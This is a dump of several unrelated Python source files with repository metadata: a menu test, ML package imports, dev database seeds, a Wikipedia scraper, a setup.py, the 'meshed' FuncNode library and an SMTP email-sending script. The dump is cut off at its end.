assert test_menu[u'2'][KEY_ITEM_NAME] == u'海帶王子麵套餐', "name is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_PRICE] == u'40', "price is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_CATEGORY] == u'', "cateogry is not correct for item id 2"
mc_menu = get_menu(u'0')
assert mc_menu is not None, "Cannot find mcdonald's menu"
print "Can get Mcdonald's menu."
print "Test pass"
if __name__ == "__main__":
test()
| 33.838095 | 96 | 0.636927 | 603 | 3,553 | 3.527363 | 0.155887 | 0.072402 | 0.105313 | 0.105783 | 0.4189 | 0.403385 | 0.362953 | 0.32111 | 0.32111 | 0.311707 | 0 | 0.019586 | 0.23839 | 3,553 | 104 | 97 | 34.163462 | 0.766445 | 0.005911 | 0 | 0.027027 | 0 | 0 | 0.247959 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | null | null | 0.013514 | 0.067568 | null | null | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a33919cebae58f61cf9d253999806d3447decc00 | 1,168 | py | Python | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | 1 | 2018-10-11T12:44:09.000Z | 2018-10-11T12:44:09.000Z | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | null | null | null | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# __author__ = wangsheng
# __copyright__ = "Copyright 2018, Trump Organization"
# __email__ = "liewmanchoi@gmail.com"
# __status__ = "experiment"
# __time__ = 2018/11/8 11:15
# __file__ = __init__.py.py
from .knearestneighbor import KNN
from .linear_model import Ridge, Lasso, ElasticNet, LogisticRegression
from .naivebayes import GaussianNB
from .decisiontree import DecisionTreeClassifier
from .decisiontree import DecisionTreeRegressor
from .RandomForest import RandomForestClassifier
from .RandomForest import RandomForestRegressor
from .gradientboosting import GradientBoostingClassifier
from .gradientboosting import GradientBoostingRegressor
from .xgboost import XGBRegressor
from .xgboost import XGBClassifier
__all__ = ['KNN',
'Ridge',
'Lasso',
'ElasticNet',
'LogisticRegression',
'GaussianNB',
'DecisionTreeClassifier',
'RandomForestClassifier',
'DecisionTreeRegressor',
'RandomForestRegressor',
'GradientBoostingClassifier',
'GradientBoostingRegressor',
'XGBClassifier',
'XGBRegressor']
| 33.371429 | 70 | 0.714041 | 89 | 1,168 | 9 | 0.516854 | 0.024969 | 0.049938 | 0.094881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01726 | 0.206336 | 1,168 | 34 | 71 | 34.352941 | 0.846818 | 0.181507 | 0 | 0 | 0 | 0 | 0.224684 | 0.144515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.44 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a340058a1e3554d3cddefc9a7ed2130183eca2f5 | 2,362 | py | Python | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | null | null | null | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | 2 | 2021-09-27T20:50:09.000Z | 2021-10-11T17:23:42.000Z | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | null | null | null | from backend.database.core import db
from backend.database import User, UserRole
from backend.auth import user_manager
from backend.database.models.incident import Incident
from backend.database.models.officer import Officer
from backend.database.models.use_of_force import UseOfForce
def create_user(user):
user_exists = (
db.session.query(User).filter_by(email=user.email).first() is not None
)
if not user_exists:
user.create()
create_user(
User(
email="test@example.com",
password=user_manager.hash_password("password"),
role=UserRole.PUBLIC,
first_name="Test",
last_name="Example",
)
)
create_user(
User(
email="contributor@example.com",
password=user_manager.hash_password("password"),
role=UserRole.CONTRIBUTOR,
first_name="Contributor",
last_name="Example",
)
)
create_user(
User(
email="admin@example.com",
password=user_manager.hash_password("password"),
role=UserRole.ADMIN,
first_name="Admin",
last_name="Example",
)
)
create_user(
User(
email="passport@example.com",
password=user_manager.hash_password("password"),
role=UserRole.PASSPORT,
first_name="Passport",
last_name="Example",
)
)
def create_incident(key=1, date="10-01-2019"):
base_id = 10000000
id = base_id + key
incident = Incident(
id=id,
location=f"Test location {key}",
description=f"Test description {key}",
department=f"Small Police Department {key}",
time_of_incident=f"{date} 00:00:00",
officers=[
Officer(
first_name=f"TestFirstName {key}",
last_name=f"TestLastName {key}",
)
],
use_of_force=[UseOfForce(item=f"gunshot {key}")],
source="mpv",
)
exists = db.session.query(Incident).filter_by(id=id).first() is not None
if not exists:
incident.create()
create_incident(key=1, date="10-01-2019")
create_incident(key=2, date="11-01-2019")
create_incident(key=3, date="12-01-2019")
create_incident(key=4, date="03-15-2020")
create_incident(key=5, date="04-15-2020")
create_incident(key=6, date="08-10-2020")
create_incident(key=7, date="10-01-2020")
create_incident(key=8, date="10-15-2020")
| 25.956044 | 78 | 0.641829 | 302 | 2,362 | 4.870861 | 0.264901 | 0.085656 | 0.104011 | 0.051666 | 0.375935 | 0.301835 | 0.276003 | 0.206662 | 0.165874 | 0.165874 | 0 | 0.051941 | 0.225656 | 2,362 | 90 | 79 | 26.244444 | 0.752324 | 0 | 0 | 0.207792 | 0 | 0 | 0.165961 | 0.009738 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0.090909 | 0.077922 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a340830aa520f9d002052b88e1e07edea29544ea | 698 | py | Python | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | 8 | 2019-05-09T02:48:54.000Z | 2022-02-14T03:58:54.000Z | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | null | null | null | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | null | null | null | from allencv.common.testing import AllenCvTestCase, ModelTestCase
from allencv.data.dataset_readers import ImageClassificationDirectory
from allencv.models import BasicImageClassifier
from allencv.modules.im2im_encoders import FeedforwardEncoder
from allencv.modules.im2vec_encoders import FlattenEncoder
class TestBasicImageClassifier(ModelTestCase):
def test_basic_experiment(self):
data_directory = AllenCvTestCase.FIXTURES_ROOT / "data" / "image_classification"
self.set_up_model(AllenCvTestCase.FIXTURES_ROOT / 'basic_image_classifier' / 'experiment.jsonnet',
data_directory)
self.ensure_model_can_train_save_and_load(self.param_file)
| 43.625 | 106 | 0.803725 | 74 | 698 | 7.297297 | 0.594595 | 0.101852 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003328 | 0.138968 | 698 | 15 | 107 | 46.533333 | 0.895175 | 0 | 0 | 0 | 0 | 0 | 0.091822 | 0.031564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a345e0e78b5623bed10fd1877afa16414a66afdb | 756 | py | Python | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | 1 | 2021-11-04T19:16:51.000Z | 2021-11-04T19:16:51.000Z | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | null | null | null | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | null | null | null | import wikipedia
from pprint import pprint
import json, os
class WikipediaScraper:
def __init__(self):
pass
def get(self, term):
try:
results = wikipedia.search(term)
if len(results) == 0:
raise RuntimeError(f'No wikipedia page for: {term}')
best_page = wikipedia.page(results[0], auto_suggest=False)
return dict(title=best_page.title, summary=best_page.summary)
except wikipedia.DisambiguationError as e:
return dict(title=term, summary='No summary could be found as the plant name is ambiguous. Try supplying a more specific plant name, such as "Peppermint" instead of "Mint", or even the latin name, "Mentha piperita," to improve results.')
| 37.8 | 249 | 0.666667 | 99 | 756 | 5.010101 | 0.626263 | 0.048387 | 0.060484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003534 | 0.251323 | 756 | 19 | 250 | 39.789474 | 0.872792 | 0 | 0 | 0 | 0 | 0.066667 | 0.30596 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0.066667 | 0.2 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a34963807f9efa829d675f7d41262cfc10b905a5 | 1,138 | py | Python | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='eamcsv2json',
description='Converts EAM CSV export to JSON',
long_description=open('README.md').read(),
author='Andrew Roden',
author_email='andrew.roden@crowdstrike.com',
url='https://github.com/crowdstrike/eamcsv2json',
# excludes requires both a parent and children filter
packages=find_packages(exclude=['tests', 'tests.*']),
# if GIT committed; include
include_package_data=True,
setup_requires=[
'setuptools_scm',
'wheel',
],
license="BSD",
keywords='',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
entry_points={
'console_scripts': [
'eamcsv2json = eamcsv2json.__main__:main',
]
},
use_scm_version=True,
)
| 30.756757 | 57 | 0.614236 | 116 | 1,138 | 5.887931 | 0.672414 | 0.111274 | 0.146413 | 0.114202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015205 | 0.248682 | 1,138 | 36 | 58 | 31.611111 | 0.783626 | 0.067663 | 0 | 0.060606 | 0 | 0 | 0.47259 | 0.050095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a350ea2475c9dc5ad3730d2b63c362bf970ae493 | 19,168 | py | Python | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | """
Base functionality of meshed
"""
from collections import Counter
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, MutableMapping, Iterable, Union, Sized, Sequence
from i2 import Sig, call_somewhat_forgivingly
from meshed.util import ValidationError, NameValidationError, mk_func_name
from meshed.itools import add_edge
def underscore_func_node_names_maker(func: Callable, name=None, out=None):
"""This name maker will resolve names in the following fashion:
#. look at the (func) name and out given as arguments, if None...
#. use mk_func_name(func) to make names.
It will use the mk_func_name(func) itself for out, but suffix the same with
an underscore to provide a mk_func_name.
This is so because here we want to allow easy construction of function networks
where a function's output will be used as another's input argument when
that argument has the the function's (output) name.
"""
if name is not None and out is not None:
return name, out
try:
name_of_func = mk_func_name(func)
except NameValidationError as err:
err_msg = err.args[0]
err_msg += (
f'\nSuggestion: You might want to specify a name explicitly in '
f'FuncNode(func, name=name) instead of just giving me the func as is.'
)
raise NameValidationError(err_msg)
if name is None and out is None:
return name_of_func + '_', name_of_func
elif out is None:
return name, '_' + name
elif name is None:
return name_of_func, out
def basic_node_validator(func_node):
"""Validates a func node. Raises ValidationError if something wrong. Returns None.
Validates:
* that the ``func_node`` params are valid, that is, if not ``None``
* ``func`` should be a callable
* ``name`` and ``out`` should be ``str``
* ``bind`` should be a ``Dict[str, str]``
* that the names (``.name``, ``.out`` and all ``.bind.values()``)
* are valid python identifiers (alphanumeric or underscore not starting with
digit)
* are not repeated (no duplicates)
* that ``.bind.keys()`` are indeed present as params of ``.func``
"""
_func_node_args_validation(
func=func_node.func, name=func_node.name, bind=func_node.bind, out=func_node.out
)
names = [func_node.name, func_node.out, *func_node.bind.values()]
names_that_are_not_strings = [name for name in names if not isinstance(name, str)]
if names_that_are_not_strings:
names_that_are_not_strings = ', '.join(map(str, names_that_are_not_strings))
raise ValidationError(f'Should be strings: {names_that_are_not_strings}')
# Make sure there's no name duplicates
_duplicates = duplicates(names)
if _duplicates:
raise ValidationError(f'{func_node} has duplicate names: {_duplicates}')
# Make sure all names are identifiers
_non_identifiers = list(filter(lambda name: not name.isidentifier(), names))
# print(_non_identifiers, names)
if _non_identifiers:
raise ValidationError(f'{func_node} non-identifier names: {_non_identifiers}')
# Making sure all src_name keys are in the function's signature
bind_names_not_in_sig_names = func_node.bind.keys() - func_node.sig.names
assert not bind_names_not_in_sig_names, (
f"some bind keys weren't found as function argnames: "
f"{', '.join(bind_names_not_in_sig_names)}"
)
# TODO: Think of the hash more carefully.
@dataclass
class FuncNode:
"""A function wrapper that makes the function amenable to operating in a network.
:param func: Function to wrap
:param name: The name to associate to the function
:param bind: The {func_argname: external_name,...} mapping that defines where
the node will source the data to call the function.
This only has to be used if the external names are different from the names
of the arguments of the function.
:param out: The variable name the function should write it's result to
Like we stated: `FuncNode` is meant to operate in computational networks.
But knowing what it does will help you make the networks you want, so we commend
your curiousity, and will oblige with an explanation.
Say you have a function to multiply numbers.
>>> def multiply(x, y):
... return x * y
And you use it in some code like this:
>>> item_price = 3.5
>>> num_of_items = 2
>>> total_price = multiply(item_price, num_of_items)
What the execution of `total_price = multiply(item_price, num_of_items)` does is
- grab the values (in the locals scope -- a dict), of ``item_price`` and ``num_of_items``,
- call the multiply function on these, and then
- write the result to a variable (in locals) named ``total_price``
`FuncNode` is a function wrapper that specification of such a
`output = function(...inputs...)` assignment statement
in such a way that it can carry it out on a `scope`.
A `scope` is a `dict` where the function can find it's input values and write its
output values.
For example, the `FuncNode` form of the above statement would be:
>>> func_node = FuncNode(
... func=multiply,
... bind={'x': 'item_price', 'y': 'num_of_items'})
>>> func_node
FuncNode(item_price,num_of_items -> multiply_ -> multiply)
Note the `bind` is a mapping **from** the variable names of the wrapped function
**to** the names of the scope.
That is, when it's time to execute, it tells the `FuncNode` where to find the values
of its inputs.
If an input is not specified in this `bind` mapping, the scope
(external) name is supposed to be the same as the function's (internal) name.
The purpose of a `FuncNode` is to source some inputs somewhere, compute something
with these, and write the result somewhere. That somewhere is what we call a
scope. A scope is a dictionary (or any mutuable mapping to be precise) and it works
like this:
>>> scope = {'item_price': 3.5, 'num_of_items': 2}
>>> func_node(scope) # see that it returns 7.0
7.0
>>> scope # but also wrote this in the scope
{'item_price': 3.5, 'num_of_items': 2, 'multiply': 7.0}
Consider ``item_price,num_of_items -> multiply_ -> multiply``.
See that the name of the function is used for the name of its output,
and an underscore-suffixed name for its function name.
That's the default behavior if you don't specify either a name (of the function)
for the `FuncNode`, or a `out`.
The underscore is to distinguish from the name of the function itself.
The function gets the underscore because this favors particular naming style.
You can give it a custom name as well.
>>> FuncNode(multiply, name='total_price', out='daily_expense')
FuncNode(x,y -> total_price -> daily_expense)
If you give an `out`, but not a `name` (for the function), the function's
name will be taken:
>>> FuncNode(multiply, out='daily_expense')
FuncNode(x,y -> multiply -> daily_expense)
If you give a `name`, but not a `out`, an underscore-prefixed version of
the `name` will be taken:
>>> FuncNode(multiply, name='total_price')
FuncNode(x,y -> total_price -> _total_price)
Note: In the context of networks if you want to reuse a same function
(say, `multiply`) in multiple places
you'll **need** to give it a custom name because the functions are identified by
this name in the network.
"""
func: Callable
name: str = field(default=None)
bind: dict = field(default_factory=dict)
out: str = field(default=None)
func_label: str = field(default=None) # TODO: Integrate more
write_output_into_scope: bool = True # TODO: Do we really want to allow False?
names_maker: Callable = underscore_func_node_names_maker
node_validator: Callable = basic_node_validator
def __post_init__(self):
_func_node_args_validation(func=self.func, name=self.name, out=self.out)
self.name, self.out = self.names_maker(self.func, self.name, self.out)
self.__name__ = self.name
# self.__name__ = self.name
# The wrapped function's signature will be useful
# when interfacing with it and the scope.
self.sig = Sig(self.func)
# replace integer bind keys with their corresponding name
self.bind = _bind_where_int_keys_repl_with_argname(self.bind, self.sig.names)
# complete bind with the argnames of the signature
_complete_dict_with_iterable_of_required_keys(self.bind, self.sig.names)
_func_node_args_validation(bind=self.bind)
self.extractor = partial(_mapped_extraction, to_extract=self.bind)
if self.func_label is None:
self.func_label = self.name
self.node_validator(self)
def synopsis_string(self):
return f"{','.join(self.bind.values())} -> {self.name} " f'-> {self.out}'
def __repr__(self):
return f'FuncNode({self.synopsis_string()})'
def call_on_scope(self, scope: MutableMapping):
"""Call the function using the given scope both to source arguments and write
results.
Note: This method is only meant to be used as a backend to __call__, not as
an actual interface method. Additional control/constraints on read and writes
can be implemented by providing a custom scope for that."""
relevant_kwargs = dict(self.extractor(scope))
args, kwargs = self.sig.args_and_kwargs_from_kwargs(relevant_kwargs)
output = call_somewhat_forgivingly(
self.func, args, kwargs, enforce_sig=self.sig
)
if self.write_output_into_scope:
scope[self.out] = output
return output
def _hash_str(self):
"""Design ideo.
Attempt to construct a hash that reflects the actual identity we want.
Need to transform to int. Only identifier chars alphanumerics and underscore
and space are used, so could possibly encode as int (for __hash__ method)
in a way that is reverse-decodable and with reasonable int size.
"""
return ';'.join(self.bind) + '::' + self.out
# TODO: Find a better one
def __hash__(self):
return hash(self._hash_str())
def __call__(self, scope):
"""Deprecated: Don't use. Might be a normal function with a signature"""
return self.call_on_scope(scope)
@classmethod
def has_as_instance(cls, obj):
"""Verify if ``obj`` is an instance of a FuncNode (or specific sub-class).
The usefulness of this method is to not have to make a lambda with isinstance
when filtering.
>>> FuncNode.has_as_instance(FuncNode(lambda x: x))
True
>>> FuncNode.has_as_instance("I am not a FuncNode: I'm a string")
False
"""
return isinstance(obj, cls)
def validate_that_func_node_names_are_sane(func_nodes: Iterable[FuncNode]):
"""Assert that the names of func_nodes are sane.
That is:
* are valid dot (graphviz) names (we'll use str.isidentifier because lazy)
* All the ``func.name`` and ``func.out`` are unique
* more to come (TODO)...
"""
func_nodes = list(func_nodes)
node_names = [x.name for x in func_nodes]
outs = [x.out for x in func_nodes]
assert all(
map(str.isidentifier, node_names)
), f"some node names weren't valid identifiers: {node_names}"
assert all(
map(str.isidentifier, outs)
), f"some return names weren't valid identifiers: {outs}"
if len(set(node_names) | set(outs)) != 2 * len(func_nodes):
c = Counter(node_names + outs)
offending_names = [name for name, count in c.items() if count > 1]
raise ValueError(
f'Some of your node names and/or outs where used more than once. '
f"They shouldn't. These are the names I find offensive: {offending_names}"
)
def _mk_func_nodes(func_nodes):
# TODO: Take care of names (or track and take care if collision)
for func_node in func_nodes:
if is_func_node(func_node):
yield func_node
elif isinstance(func_node, Callable):
yield FuncNode(func_node)
else:
raise TypeError(f"Can't convert this to a FuncNode: {func_node}")
def _func_nodes_to_graph_dict(func_nodes):
g = dict()
for f in func_nodes:
for src_name in f.bind.values():
add_edge(g, src_name, f)
add_edge(g, f, f.out)
return g
def is_func_node(obj) -> bool:
"""
>>> is_func_node(FuncNode(lambda x: x))
True
>>> is_func_node("I am not a FuncNode: I'm a string")
False
"""
# A weaker check than an isinstance(obj, FuncNode), which fails when we're
# developing (therefore changing) FuncNode definition (without relaunching python
# kernel). This is to be used instead, at least during development times
# TODO: Replace with isinstance(obj, FuncNode) is this when development
# stabalizes
# return isinstance(obj, FuncNode)
cls = type(obj)
if cls is not type:
return any(getattr(x, '__name__', '') == 'FuncNode' for x in cls.mro())
else:
return False
def is_not_func_node(obj) -> bool:
"""
>>> is_not_func_node(FuncNode(lambda x: x))
False
>>> is_not_func_node("I am not a FuncNode: I'm a string")
True
"""
return not FuncNode.has_as_instance(obj)
def get_init_params_of_instance(obj):
"""Get names of instance object ``obj`` that are also parameters of the
``__init__`` of its class"""
return {k: v for k, v in vars(obj).items() if k in Sig(type(obj)).names}
def ch_func_node_attrs(fn, **new_attrs_values):
"""Returns a copy of the func node with some of it's attributes changed
>>> def plus(a, b):
... return a + b
...
>>> def minus(a, b):
... return a - b
...
>>> fn = FuncNode(func=plus, out='sum')
>>> fn.func == plus
True
>>> fn.name == 'plus'
True
>>> new_fn = ch_func_node_attrs(fn, func=minus)
>>> new_fn.func == minus
True
>>> new_fn.synopsis_string() == 'a,b -> plus -> sum'
True
>>>
>>>
>>> newer_fn = ch_func_node_attrs(fn, func=minus, name='sub', out='difference')
>>> newer_fn.synopsis_string() == 'a,b -> sub -> difference'
True
"""
init_params = get_init_params_of_instance(fn)
if params_that_are_not_init_params := (new_attrs_values.keys() - init_params):
raise ValueError(
f'These are not params of {type(fn).__name__}: '
f'{params_that_are_not_init_params}'
)
fn_kwargs = dict(init_params, **new_attrs_values)
return FuncNode(**fn_kwargs)
def _keys_and_values_are_strings_validation(d: dict):
for k, v in d.items():
if not isinstance(k, str):
raise ValidationError(f'Should be a str: {k}')
if not isinstance(v, str):
raise ValidationError(f'Should be a str: {v}')
def _func_node_args_validation(
*, func: Callable = None, name: str = None, bind: dict = None, out: str = None
):
"""Validates the four first arguments that are used to make a ``FuncNode``.
Namely, if not ``None``,
* ``func`` should be a callable
* ``name`` and ``out`` should be ``str``
* ``bind`` should be a ``Dict[str, str]``, ``Dict[int, str]`` or ``List[str]``
* ``out`` should be a str
"""
if func is not None and not isinstance(func, Callable):
raise ValidationError(f'Should be callable: {func}')
if name is not None and not isinstance(name, str):
raise ValidationError(f'Should be a str: {name}')
if bind is not None:
if not isinstance(bind, dict):
raise ValidationError(f'Should be a dict: {bind}')
_keys_and_values_are_strings_validation(bind)
if out is not None and not isinstance(out, str):
raise ValidationError(f'Should be a str: {out}')
def _old_mapped_extraction(extract_from: dict, key_map: dict):
"""Deprecated: Old version of _mapped_extraction.
for every (k, v) of key_map whose v is a key of extract_from, yields
(v, extract_from[v])
Meant to be curried into an extractor, and wrapped in dict.
>>> extracted = _old_mapped_extraction(
... {'a': 1, 'b': 2, 'c': 3}, # extract_from
... {'A': 'a', 'C': 'c', 'D': 'd'} # note that there's no 'd' in extract_from
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for k, v in key_map.items():
if v in extract_from:
yield v, extract_from[v]
def _mapped_extraction(src: dict, to_extract: dict):
"""for every (desired_name, src_name) of to_extract whose v is a key of source,
yields (desired_name, source[src_name])
It's purpose is to extract inputs from a src.
The names used in the src may be different from those desired by the function,
those to_extract specifies what to extract by a {desired_name: src_name, ...}
map.
_mapped_extraction_ is mant to be curried into an extractor.
>>> extracted = _mapped_extraction(
... src={'A': 1, 'B': 2, 'C': 3},
... to_extract={'a': 'A', 'c': 'C', 'd': 'D'} # note that there's no 'd' here
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for desired_name, src_name in to_extract.items():
if src_name in src:
yield desired_name, src[src_name]
def duplicates(elements: Union[Iterable, Sized]):
c = Counter(elements)
if len(c) != len(elements):
return [name for name, count in c.items() if count > 1]
else:
return []
def _bind_where_int_keys_repl_with_argname(bind: dict, names: Sequence[str]) -> dict:
"""
:param bind: A bind dict, as used in FuncNode
:param names: A sequence of strings
:return: A bind dict where integer keys were replaced with the corresponding
name from names.
>>> bind = {0: 'a', 1: 'b', 'c': 'x', 'd': 'y'}
>>> names = 'e f g h'.split()
>>> _bind_where_int_keys_repl_with_argname(bind, names)
{'e': 'a', 'f': 'b', 'c': 'x', 'd': 'y'}
"""
def transformed_items():
for k, v in bind.items():
if isinstance(k, int):
argname = names[k]
yield argname, v
else:
yield k, v
return dict(transformed_items())
def _complete_dict_with_iterable_of_required_keys(
to_complete: dict, complete_with: Iterable
):
"""Complete `to_complete` (in place) with `complete_with`
`complete_with` contains values that must be covered by `to_complete`
Those values that are not covered will be inserted in to_complete,
with key=val
>>> d = {'a': 'A', 'c': 'C'}
>>> _complete_dict_with_iterable_of_required_keys(d, 'abc')
>>> d
{'a': 'A', 'c': 'C', 'b': 'b'}
"""
keys_already_covered = set(to_complete)
for required_key in complete_with:
if required_key not in keys_already_covered:
to_complete[required_key] = required_key
| 36.441065 | 94 | 0.653537 | 2,828 | 19,168 | 4.263791 | 0.165488 | 0.027202 | 0.007464 | 0.015674 | 0.22682 | 0.145961 | 0.085503 | 0.064356 | 0.034002 | 0.029524 | 0 | 0.002203 | 0.242227 | 19,168 | 525 | 95 | 36.510476 | 0.827952 | 0.506782 | 0 | 0.05291 | 0 | 0 | 0.115099 | 0.018948 | 0 | 0 | 0 | 0.011429 | 0.015873 | 1 | 0.132275 | false | 0 | 0.037037 | 0.015873 | 0.322751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a351abdfff69d885b5a22be4fa59283c80a7b781 | 1,363 | py | Python | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/python
# coding:utf-8
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
__author__ = 'hgf'
HOST = "smtp.qq.com"
SUBJECT = u"业务性能数据表"
FROM = "980673553@qq.com"
TO = "hgfgoodcreate@163.com"
def addimg(src, imgid):
fp = open(src, 'rb')
msgImg = MIMEImage(fp.read())
fp.close()
msgImg.add_header('Content-ID', imgid)
return msgImg
msg = MIMEMultipart('related')
msgtext = MIMEText("""
<font>官网业务平均时延图表:<br><img src=\"cid:p1\" border =\"1\"><br>详细内附件图表</font>
""", "html", "utf-8")
msg.attach(msgtext)
msg.attach(addimg("/home/hgf/Pictures/program/logo/1.PNG", "p1"))
attach = MIMEText(open("/home/hgf/test.xlsx", 'rb').read(), "base64", "utf-8")
attach["Content-type"] = "application/octet-stream"
# 指定文件格式类型
# 指定ContentDisposition 属性值为attachement 则会出现自爱在保存对话框
# qqmail使用gb18030编码,为保证中文不会乱码,对文件名进行编码转换
attach["Content-Disposition"] = "attachment;filename=\"测试excel.xlsx\"".decode("utf-8").encode("gb18030")
msg.attach(attach)
msg['Subject'] = SUBJECT
msg['From'] = FROM
msg['To'] = TO
try:
server = smtplib.SMTP()
server.connect(HOST, 25)
server.starttls()
server.login(FROM, "passwprd")
server.sendmail(FROM, TO, msg.as_string())
server.quit()
print("发送成功!")
except Exception, e:
